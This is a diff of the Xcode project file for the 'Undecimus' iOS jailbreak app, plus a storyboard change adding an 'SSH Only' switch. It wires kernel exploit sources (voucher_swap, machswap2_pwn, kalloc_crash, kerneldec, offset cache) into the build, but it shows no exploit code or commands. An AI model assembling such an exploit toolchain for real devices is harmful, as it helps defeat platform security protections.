|
||||
2150A9CE22021347001C8677 /* log.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = log.c; sourceTree = "<group>"; };
|
||||
@@ -101,8 +109,6 @@
|
||||
2150A9E322021381001C8677 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = "<group>"; };
|
||||
2150A9E422021381001C8677 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = "<group>"; };
|
||||
2150A9E52202138A001C8677 /* IOKitLib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
|
||||
2166453B22257E7900B37252 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = "<group>"; };
|
||||
2166453C22257E7900B37252 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzssdec.h; sourceTree = "<group>"; };
|
||||
216F3F352228776D007DC1BC /* user_client.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = user_client.h; sourceTree = "<group>"; };
|
||||
216F3F362228776D007DC1BC /* kernel_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_call.c; sourceTree = "<group>"; };
|
||||
216F3F372228776D007DC1BC /* user_client.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = user_client.c; sourceTree = "<group>"; };
|
||||
@@ -113,6 +119,11 @@
|
||||
216F3F3C2228776E007DC1BC /* kc_parameters.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kc_parameters.c; sourceTree = "<group>"; };
|
||||
216FDA1D220C5F5C0086D802 /* libz.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libz.tbd; path = usr/lib/libz.tbd; sourceTree = SDKROOT; };
|
||||
2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = SystemConfiguration.framework; path = System/Library/Frameworks/SystemConfiguration.framework; sourceTree = SDKROOT; };
|
||||
2199B8E7226B40C600A8255D /* kalloc_crash.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kalloc_crash.h; sourceTree = "<group>"; };
|
||||
2199B8E8226B40C600A8255D /* kalloc_crash.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kalloc_crash.c; sourceTree = "<group>"; };
|
||||
219BF90422832DBC00A4B827 /* UIProgressHUD.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = UIProgressHUD.h; sourceTree = "<group>"; };
|
||||
219C909E228703DA00AFA38A /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = "<group>"; };
|
||||
219C909F228703DA00AFA38A /* jailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = "<group>"; };
|
||||
21A97FC42148103A00DC0023 /* KernelExecution.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelExecution.h; sourceTree = "<group>"; };
|
||||
21A97FC52148103B00DC0023 /* remote_call.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remote_call.h; sourceTree = "<group>"; };
|
||||
21A97FC62148103B00DC0023 /* remote_memory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = remote_memory.c; sourceTree = "<group>"; };
|
||||
@@ -121,6 +132,9 @@
|
||||
21A97FCC2148103B00DC0023 /* KernelUtilities.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = KernelUtilities.c; sourceTree = "<group>"; };
|
||||
21A97FCD2148103B00DC0023 /* remote_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = remote_call.c; sourceTree = "<group>"; };
|
||||
21A97FCE2148103C00DC0023 /* remote_memory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remote_memory.h; sourceTree = "<group>"; };
|
||||
21B4218F2261302F004C17CD /* MobileCoreServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = MobileCoreServices.framework; path = System/Library/Frameworks/MobileCoreServices.framework; sourceTree = SDKROOT; };
|
||||
21BB9802222F05C40012AF40 /* machswap2_pwn.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap2_pwn.m; sourceTree = "<group>"; };
|
||||
21BB9803222F05C40012AF40 /* machswap2_pwn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap2_pwn.h; sourceTree = "<group>"; };
|
||||
21C0FC6721369EB700849420 /* Undecimus.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Undecimus.app; sourceTree = BUILT_PRODUCTS_DIR; };
|
||||
21C0FC6A21369EB700849420 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
|
||||
21C0FC6B21369EB700849420 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
|
||||
@@ -132,10 +146,10 @@
|
||||
21C0FC7921369EB800849420 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
|
||||
21C0FC8021369EE900849420 /* KernelMemory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = KernelMemory.c; sourceTree = "<group>"; };
|
||||
21C0FC8121369EE900849420 /* empty_list_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = empty_list_sploit.h; sourceTree = "<group>"; };
|
||||
21C0FC8221369EE900849420 /* KernelStructureOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelStructureOffsets.h; sourceTree = "<group>"; };
|
||||
21C0FC8221369EE900849420 /* KernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelOffsets.h; sourceTree = "<group>"; };
|
||||
21C0FC8321369EE900849420 /* KernelMemory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelMemory.h; sourceTree = "<group>"; };
|
||||
21C0FC8521369EE900849420 /* empty_list_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = empty_list_sploit.c; sourceTree = "<group>"; };
|
||||
21C0FC8621369EE900849420 /* KernelStructureOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelStructureOffsets.m; sourceTree = "<group>"; };
|
||||
21C0FC8621369EE900849420 /* KernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelOffsets.m; sourceTree = "<group>"; };
|
||||
21C0FC8B21369FC500849420 /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = "<group>"; };
|
||||
21C0FC8F2136A2C500849420 /* iokit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = iokit.h; sourceTree = "<group>"; };
|
||||
21C0FC902136A46500849420 /* SpringBoardServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = SpringBoardServices.framework; sourceTree = "<group>"; };
|
||||
@@ -148,17 +162,22 @@
|
||||
21C13117214D268F0021AA9D /* multi_path_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multi_path_sploit.c; sourceTree = "<group>"; };
|
||||
21C13118214D268F0021AA9D /* multi_path_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multi_path_sploit.h; sourceTree = "<group>"; };
|
||||
21C1312E214D5A710021AA9D /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
|
||||
21CC3901227CDFDE0072D572 /* prefs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = prefs.h; sourceTree = "<group>"; };
|
||||
21CC3902227CDFDE0072D572 /* prefs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = prefs.m; sourceTree = "<group>"; };
|
||||
21CC3903227CDFDE0072D572 /* diagnostics.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = diagnostics.m; sourceTree = "<group>"; };
|
||||
21CC3904227CDFDE0072D572 /* diagnostics.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = diagnostics.h; sourceTree = "<group>"; };
|
||||
21E9642421A1DD6F000625F7 /* NSTask.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = NSTask.h; sourceTree = "<group>"; };
|
||||
21F4D70C21FC7A590070D5E0 /* patchfinder64.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = patchfinder64.c; path = patchfinder64/patchfinder64.c; sourceTree = SOURCE_ROOT; };
|
||||
21F4D70D21FC7A590070D5E0 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = patchfinder64.h; path = patchfinder64/patchfinder64.h; sourceTree = SOURCE_ROOT; };
|
||||
21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = Painting_With_Chocolate.ttf; sourceTree = "<group>"; };
|
||||
21FF63C9224E5FDC008B76D9 /* offsetcache.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = offsetcache.c; path = "offset-cache/offsetcache.c"; sourceTree = SOURCE_ROOT; };
|
||||
21FF63CA224E5FDC008B76D9 /* offsetcache.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = offsetcache.h; path = "offset-cache/offsetcache.h"; sourceTree = SOURCE_ROOT; };
|
||||
21FFE0F4222E4C0600EC59B2 /* machswap_pwn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap_pwn.h; sourceTree = "<group>"; };
|
||||
21FFE0F5222E4C0600EC59B2 /* machswap_offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap_offsets.h; sourceTree = "<group>"; };
|
||||
21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap_offsets.m; sourceTree = "<group>"; };
|
||||
21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap_pwn.m; sourceTree = "<group>"; };
|
||||
222AD59221FA731800DCBA2A /* FakeApt.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = FakeApt.m; sourceTree = "<group>"; };
|
||||
222AD59421FA732A00DCBA2A /* FakeApt.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = FakeApt.h; sourceTree = "<group>"; };
|
||||
2253F710221020EA0031D809 /* libmagic.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmagic.a; path = Undecimus/libs/libmagic.a; sourceTree = "<group>"; };
|
||||
225D142121E052960045493D /* ArchiveFile.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ArchiveFile.m; sourceTree = "<group>"; };
|
||||
225D142321E055E90045493D /* ArchiveFile.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ArchiveFile.h; sourceTree = "<group>"; };
|
||||
226689DA21EC145000262F66 /* archive.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = archive.h; sourceTree = "<group>"; };
|
||||
@@ -179,12 +198,11 @@
|
||||
isa = PBXFrameworksBuildPhase;
|
||||
buildActionMask = 2147483647;
|
||||
files = (
|
||||
21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */,
|
||||
2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */,
|
||||
2253F711221020EB0031D809 /* libmagic.a in Frameworks */,
|
||||
216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */,
|
||||
226689DD21EC1C5A00262F66 /* libarchive.2.tbd in Frameworks */,
|
||||
22CFED9221CDFE6B00A216BE /* libmis.tbd in Frameworks */,
|
||||
214D283C22146EC70058933D /* libmagic.a in Frameworks */,
|
||||
2170BDCD21B332FC0059BD10 /* SpringBoardServices.framework in Frameworks */,
|
||||
2170BD3B21B193800059BD10 /* libMobileGestalt.tbd in Frameworks */,
|
||||
);
|
||||
@@ -219,6 +237,17 @@
|
||||
name = necp;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
214A1771224EBE4900588EC4 /* kerneldec */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
214A1774224EBE5400588EC4 /* kerneldec.cpp */,
|
||||
214A1772224EBE5400588EC4 /* kerneldec.h */,
|
||||
214A1773224EBE5400588EC4 /* lzssdec.cpp */,
|
||||
214A1775224EBE5400588EC4 /* lzssdec.h */,
|
||||
);
|
||||
name = kerneldec;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
2150A9C6220212A6001C8677 /* empty_list */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
@@ -284,20 +313,11 @@
|
||||
name = voucher_swap;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
2166453A22257E7000B37252 /* lzssdec */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
2166453B22257E7900B37252 /* lzssdec.cpp */,
|
||||
2166453C22257E7900B37252 /* lzssdec.h */,
|
||||
);
|
||||
name = lzssdec;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
21675B62214A68B700D20E2B /* Frameworks */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
21B4218F2261302F004C17CD /* MobileCoreServices.framework */,
|
||||
2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */,
|
||||
2253F710221020EA0031D809 /* libmagic.a */,
|
||||
216FDA1D220C5F5C0086D802 /* libz.tbd */,
|
||||
226689DC21EC1C5A00262F66 /* libarchive.2.tbd */,
|
||||
22CFED9121CDFE6B00A216BE /* libmis.tbd */,
|
||||
@@ -321,18 +341,10 @@
|
||||
name = kernel_call;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
216FDA02220C5B620086D802 /* libs */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
214D283B22146EC70058933D /* libmagic.a */,
|
||||
);
|
||||
path = libs;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
2170BD3421B192750059BD10 /* include */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
214D283D22146EE60058933D /* magic.h */,
|
||||
219BF90422832DBC00A4B827 /* UIProgressHUD.h */,
|
||||
2150A9E322021381001C8677 /* mach_vm.h */,
|
||||
2150A9E422021381001C8677 /* ipc_port.h */,
|
||||
2150A9E52202138A001C8677 /* IOKitLib.h */,
|
||||
@@ -352,7 +364,6 @@
|
||||
2170BD3621B192B90059BD10 /* resources */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
21C1312E214D5A710021AA9D /* multi_path.entitlements */,
|
||||
21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */,
|
||||
);
|
||||
path = resources;
|
||||
@@ -361,9 +372,11 @@
|
||||
2170BDCB21B32FF10059BD10 /* source */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
2199B8E6226B40BD00A8255D /* kalloc_crash */,
|
||||
214A1771224EBE4900588EC4 /* kerneldec */,
|
||||
21FF63C8224E5FCE008B76D9 /* offset-cache */,
|
||||
21FFE0F3222E4B1600EC59B2 /* machswap */,
|
||||
216F3F342228774D007DC1BC /* kernel_call */,
|
||||
2166453A22257E7000B37252 /* lzssdec */,
|
||||
213E78222208652B00FDF3B7 /* necp */,
|
||||
2150A9CA220212F8001C8677 /* voucher_swap */,
|
||||
2150A9C9220212E6001C8677 /* deja_xnu */,
|
||||
@@ -381,8 +394,8 @@
|
||||
21A97FC82148103B00DC0023 /* KernelExecution.m */,
|
||||
21C0FC8021369EE900849420 /* KernelMemory.c */,
|
||||
21C0FC8321369EE900849420 /* KernelMemory.h */,
|
||||
21C0FC8221369EE900849420 /* KernelStructureOffsets.h */,
|
||||
21C0FC8621369EE900849420 /* KernelStructureOffsets.m */,
|
||||
21C0FC8221369EE900849420 /* KernelOffsets.h */,
|
||||
21C0FC8621369EE900849420 /* KernelOffsets.m */,
|
||||
21A97FC92148103B00DC0023 /* KernelUtilities.h */,
|
||||
21A97FCC2148103B00DC0023 /* KernelUtilities.c */,
|
||||
21C0FC7921369EB800849420 /* main.m */,
|
||||
@@ -402,6 +415,12 @@
|
||||
22C546AA21A8A8FD00EFC09C /* utils.m */,
|
||||
222AD59421FA732A00DCBA2A /* FakeApt.h */,
|
||||
222AD59221FA731800DCBA2A /* FakeApt.m */,
|
||||
21CC3901227CDFDE0072D572 /* prefs.h */,
|
||||
21CC3902227CDFDE0072D572 /* prefs.m */,
|
||||
21CC3904227CDFDE0072D572 /* diagnostics.h */,
|
||||
21CC3903227CDFDE0072D572 /* diagnostics.m */,
|
||||
219C909E228703DA00AFA38A /* jailbreak.h */,
|
||||
219C909F228703DA00AFA38A /* jailbreak.m */,
|
||||
);
|
||||
path = source;
|
||||
sourceTree = "<group>";
|
||||
@@ -414,6 +433,15 @@
|
||||
path = frameworks;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
2199B8E6226B40BD00A8255D /* kalloc_crash */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
2199B8E7226B40C600A8255D /* kalloc_crash.h */,
|
||||
2199B8E8226B40C600A8255D /* kalloc_crash.c */,
|
||||
);
|
||||
name = kalloc_crash;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
21C0FC5E21369EB700849420 = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
@@ -435,7 +463,6 @@
|
||||
21C0FC6921369EB700849420 /* Undecimus */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
216FDA02220C5B620086D802 /* libs */,
|
||||
2170BDCC21B330210059BD10 /* frameworks */,
|
||||
2170BDCB21B32FF10059BD10 /* source */,
|
||||
2170BD3621B192B90059BD10 /* resources */,
|
||||
@@ -444,6 +471,7 @@
|
||||
21C0FC7321369EB800849420 /* Assets.xcassets */,
|
||||
21C0FC7521369EB800849420 /* LaunchScreen.storyboard */,
|
||||
21C0FC7821369EB800849420 /* Info.plist */,
|
||||
21C1312E214D5A710021AA9D /* multi_path.entitlements */,
|
||||
);
|
||||
path = Undecimus;
|
||||
sourceTree = "<group>";
|
||||
@@ -457,6 +485,15 @@
|
||||
name = patchfinder64;
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
21FF63C8224E5FCE008B76D9 /* offset-cache */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
21FF63C9224E5FDC008B76D9 /* offsetcache.c */,
|
||||
21FF63CA224E5FDC008B76D9 /* offsetcache.h */,
|
||||
);
|
||||
name = "offset-cache";
|
||||
sourceTree = "<group>";
|
||||
};
|
||||
21FFE0F3222E4B1600EC59B2 /* machswap */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
@@ -464,6 +501,8 @@
|
||||
21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */,
|
||||
21FFE0F4222E4C0600EC59B2 /* machswap_pwn.h */,
|
||||
21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */,
|
||||
21BB9803222F05C40012AF40 /* machswap2_pwn.h */,
|
||||
21BB9802222F05C40012AF40 /* machswap2_pwn.m */,
|
||||
);
|
||||
name = machswap;
|
||||
sourceTree = "<group>";
|
||||
@@ -513,7 +552,7 @@
|
||||
21C0FC5F21369EB700849420 /* Project object */ = {
|
||||
isa = PBXProject;
|
||||
attributes = {
|
||||
LastUpgradeCheck = 0940;
|
||||
LastUpgradeCheck = 1010;
|
||||
ORGANIZATIONNAME = Pwn20wnd;
|
||||
TargetAttributes = {
|
||||
21C0FC6621369EB700849420 = {
|
||||
@@ -575,7 +614,6 @@
|
||||
isa = PBXSourcesBuildPhase;
|
||||
buildActionMask = 2147483647;
|
||||
files = (
|
||||
2166453D22257E7900B37252 /* lzssdec.cpp in Sources */,
|
||||
21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */,
|
||||
216F3F3E2228776E007DC1BC /* user_client.c in Sources */,
|
||||
2150A9E022021348001C8677 /* parameters.c in Sources */,
|
||||
@@ -591,23 +629,31 @@
|
||||
21A97FD42148103C00DC0023 /* remote_call.c in Sources */,
|
||||
21C130E0214BC2880021AA9D /* unlocknvram.c in Sources */,
|
||||
21C13119214D268F0021AA9D /* multi_path_sploit.c in Sources */,
|
||||
214A1777224EBE5400588EC4 /* kerneldec.cpp in Sources */,
|
||||
2116449A21737F9500250744 /* JailbreakViewController.m in Sources */,
|
||||
21F4D70E21FC7A590070D5E0 /* patchfinder64.c in Sources */,
|
||||
2150A9DE22021348001C8677 /* platform.c in Sources */,
|
||||
213E7828220865A100FDF3B7 /* voucher_swap-poc.c in Sources */,
|
||||
22F91CDB21E02CF300B2FCAE /* inject.m in Sources */,
|
||||
2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */,
|
||||
21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */,
|
||||
21C0FC8721369EE900849420 /* KernelMemory.c in Sources */,
|
||||
21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */,
|
||||
21C0FC7A21369EB800849420 /* main.m in Sources */,
|
||||
212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */,
|
||||
21CC3905227CDFDE0072D572 /* prefs.m in Sources */,
|
||||
21A97FD02148103C00DC0023 /* remote_memory.c in Sources */,
|
||||
222AD59321FA731800DCBA2A /* FakeApt.m in Sources */,
|
||||
21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */,
|
||||
216F3F3F2228776E007DC1BC /* pac.c in Sources */,
|
||||
21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */,
|
||||
21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */,
|
||||
219C90A0228703DA00AFA38A /* jailbreak.m in Sources */,
|
||||
21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */,
|
||||
21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */,
|
||||
21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */,
|
||||
212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */,
|
||||
21BB9804222F05C40012AF40 /* machswap2_pwn.m in Sources */,
|
||||
214A1776224EBE5400588EC4 /* lzssdec.cpp in Sources */,
|
||||
2150A9E222021348001C8677 /* kernel_memory.c in Sources */,
|
||||
216F3F402228776E007DC1BC /* kc_parameters.c in Sources */,
|
||||
2150A9DF22021348001C8677 /* kernel_slide.c in Sources */,
|
||||
@@ -747,9 +793,13 @@
|
||||
isa = XCBuildConfiguration;
|
||||
buildSettings = {
|
||||
ALWAYS_SEARCH_USER_PATHS = YES;
|
||||
ARCHS = (
|
||||
arm64e,
|
||||
arm64,
|
||||
);
|
||||
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
|
||||
CLANG_ENABLE_OBJC_ARC = YES;
|
||||
CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/resources/multi_path.entitlements";
|
||||
CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/multi_path.entitlements";
|
||||
CODE_SIGN_IDENTITY = "iPhone Developer";
|
||||
CODE_SIGN_STYLE = Manual;
|
||||
DEVELOPMENT_TEAM = "";
|
||||
@@ -765,6 +815,8 @@
|
||||
"$(PROJECT_DIR)/patchfinder64",
|
||||
"$(PROJECT_DIR)/snappy",
|
||||
"$(PROJECT_DIR)/Injector",
|
||||
"$(PROJECT_DIR)/offset-cache",
|
||||
"$(PROJECT_DIR)/kerneldec",
|
||||
);
|
||||
INFOPLIST_FILE = Undecimus/Info.plist;
|
||||
IPHONEOS_DEPLOYMENT_TARGET = 11.0;
|
||||
@@ -774,6 +826,7 @@
|
||||
"$(PROJECT_DIR)/Undecimus",
|
||||
"$(PROJECT_DIR)/Undecimus/libs",
|
||||
);
|
||||
ONLY_ACTIVE_ARCH = NO;
|
||||
OTHER_CFLAGS = "";
|
||||
"OTHER_CFLAGS[arch=*]" = "-DUNDECIMUS";
|
||||
OTHER_LDFLAGS = (
|
||||
@@ -785,6 +838,7 @@
|
||||
PRODUCT_NAME = "$(TARGET_NAME)";
|
||||
PROVISIONING_PROFILE_SPECIFIER = "";
|
||||
TARGETED_DEVICE_FAMILY = "1,2";
|
||||
VALID_ARCHS = "arm64 arm64e";
|
||||
};
|
||||
name = Debug;
|
||||
};
|
||||
@@ -792,9 +846,13 @@
|
||||
isa = XCBuildConfiguration;
|
||||
buildSettings = {
|
||||
ALWAYS_SEARCH_USER_PATHS = YES;
|
||||
ARCHS = (
|
||||
arm64e,
|
||||
arm64,
|
||||
);
|
||||
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
|
||||
CLANG_ENABLE_OBJC_ARC = YES;
|
||||
CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/resources/multi_path.entitlements";
|
||||
CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/multi_path.entitlements";
|
||||
CODE_SIGN_IDENTITY = "iPhone Developer";
|
||||
CODE_SIGN_STYLE = Manual;
|
||||
DEVELOPMENT_TEAM = "";
|
||||
@@ -810,6 +868,8 @@
|
||||
"$(PROJECT_DIR)/patchfinder64",
|
||||
"$(PROJECT_DIR)/snappy",
|
||||
"$(PROJECT_DIR)/Injector",
|
||||
"$(PROJECT_DIR)/offset-cache",
|
||||
"$(PROJECT_DIR)/kerneldec",
|
||||
);
|
||||
INFOPLIST_FILE = Undecimus/Info.plist;
|
||||
IPHONEOS_DEPLOYMENT_TARGET = 11.0;
|
||||
@@ -830,6 +890,7 @@
|
||||
PRODUCT_NAME = "$(TARGET_NAME)";
|
||||
PROVISIONING_PROFILE_SPECIFIER = "";
|
||||
TARGETED_DEVICE_FAMILY = "1,2";
|
||||
VALID_ARCHS = "arm64 arm64e";
|
||||
};
|
||||
name = Release;
|
||||
};
|
||||
|
||||
+123
-17
@@ -777,9 +777,111 @@
|
||||
</tableViewCellContentView>
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="VAY-4U-acE">
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="28P-wg-gQj">
|
||||
<rect key="frame" x="0.0" y="759.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="28P-wg-gQj" id="maO-LE-rdL">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<subviews>
|
||||
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="rYA-6q-037">
|
||||
<rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
|
||||
<color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
|
||||
<connections>
|
||||
<action selector="sshOnlySwitchTriggered:" destination="ScN-Hx-Um8" eventType="valueChanged" id="YJ7-k5-jX0"/>
|
||||
</connections>
|
||||
</switch>
|
||||
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SSH Only" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="j6O-q3-UUd">
|
||||
<rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
|
||||
<constraints>
|
||||
<constraint firstAttribute="height" constant="20.5" id="WGe-9B-keN"/>
|
||||
<constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="cyw-H2-26F"/>
|
||||
</constraints>
|
||||
<fontDescription key="fontDescription" type="system" pointSize="17"/>
